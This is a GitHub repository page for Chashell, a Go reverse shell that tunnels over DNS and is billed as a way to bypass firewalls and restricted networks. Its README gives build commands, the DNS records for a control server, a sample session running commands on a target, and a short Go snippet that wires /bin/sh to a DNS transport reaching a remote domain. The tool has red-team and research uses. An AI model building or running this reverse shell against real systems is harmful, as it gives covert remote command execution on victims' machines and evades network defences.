Skip to content
/ chashell Public
forked from sysdream/chashell

Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.

0 stars 132 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

MKSx/chashell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
cmd
cmd
 
 
img
img
 
 
lib
lib
 
 
proto
proto
 
 
.gitignore
.gitignore
 
 
Gopkg.lock
Gopkg.lock
 
 
Gopkg.toml
Gopkg.toml
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 

Repository files navigation

Chashell

Reverse Shell over DNS

Chashell is a Go reverse shell that communicate using DNS. It can be used to bypass firewall or heavy restricted networks.

It comes with a multi-client control server named chaserv.

Chaserv

Communication security

Every packets are encrypted using symetric cryptography (XSalsa20 + Poly1305) with a shared key between the client and the server.

Asymmetric cryptography is planned.

Protocol

Chashell communicate using Protocol Buffers serialized messages. The .proto file is available in the proto folder.

Here is a (simplified) communication chart :

Protocol

Keep in mind that every packets are encrypted, hex-encoded and then packed for DNS.

Supported systems

All desktop systems (Windows, Linux, Darwin, BSD variants) supported by the Go compiler should work.

We tested those systems and it works without issues :

  • Windows (386/amd64)
  • Linux (386/amd64/arm64)

How to use Chaserv/Chashell

Building

Build all the binaries (change the domain_name and the encryption_key) :

$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.sysdream.com
$ make build-all

Building for a specific platform :

$ make build-all OSARCH="linux/arm"

Building the server only :

$ make build-server

Building the client (chashell) only :

$ make build-client

DNS Settings

  • Buy/use a domain name of your choice (small if possible).
  • Set a DNS record like this :
chashell 300 IN A [SERVERIP]
c 300 IN NS chashell.[DOMAIN].
  • Run chaserv on the control server.
  • Run chashell on the target computer.

The client should now appear on chaserv :

[n.chatelain]$ sudo ./chaserv
chashell >>> sessions 5c54404419e59881dfa3a757
Interacting with session 5c54404419e59881dfa3a757.
whoami
n.chatelain
ls /
bin
boot
dev
[...]
usr
var

On the server, use the chaserv binary. For the client (or the target), use the chashell binary.

Implement your own

The chashell/lib/transport is compatible with the io.Reader / io.Writer interface. So, implementing a reverse shell is easy as :

cmd := exec.Command("/bin/sh")

dnsTransport := transport.DNSStream(targetDomain, encryptionKey)

cmd.Stdout = dnsTransport
cmd.Stderr = dnsTransport
cmd.Stdin = dnsTransport
cmd.Run()

To Do

  • Implement asymmetric cryptography (Curve25519, XSalsa20 and Poly1305)
  • Retrieve the hostname using the InfoPacket message.
  • Create a "proxy/relay" tool in order to tunnel TCP/UDP streams. (Meterpreter over DNS !)

About

Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Go 91.9%
  • Makefile 8.1%